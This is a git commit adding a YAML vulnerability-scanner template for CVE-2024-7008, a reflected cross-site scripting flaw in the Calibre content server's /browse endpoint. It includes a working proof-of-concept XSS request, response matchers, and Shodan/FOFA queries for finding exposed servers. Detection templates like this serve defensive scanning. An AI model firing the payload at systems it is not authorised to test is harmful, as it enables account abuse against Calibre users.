Create CVE-2024-7008.yaml

main
Dhiyaneshwaran 2024-07-31 22:02:06 +05:30 committed by GitHub
parent 28641724a4
commit ce8153d386
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 38 additions and 0 deletions

View File

@ -0,0 +1,38 @@
id: CVE-2024-7008
info:
name: Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS)
author: DhiyaneshDK
severity: medium
description: |
It is possible to inject arbitrary JavaScript code into the /browse endpoint of the Calibre content server, allowing an attacker to craft a URL that when clicked by a victim, will execute the attackers JavaScript code in the context of the victims browser. If the Calibre server is running with authentication enabled and the victim is logged in at the time, this can be used to cause the victim to perform actions on the Calibre server on behalf of the attacker.
reference:
- https://starlabs.sg/advisories/24/24-7008/
metadata:
verified: true
shodan-query: html:"Calibre"
fofa-query: "Server: calibre"
max-requeset: 1
tags: cve,cve2024,calibre,xss
http:
- raw:
- |
GET /browse/book/TEST&quot;;window.stop();alert(document.domain);%2f%2f HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- 'window.location.href = "/#book_id=TEST";window.stop();alert(document.domain);//&panel=book_details'
- type: status
status:
- 200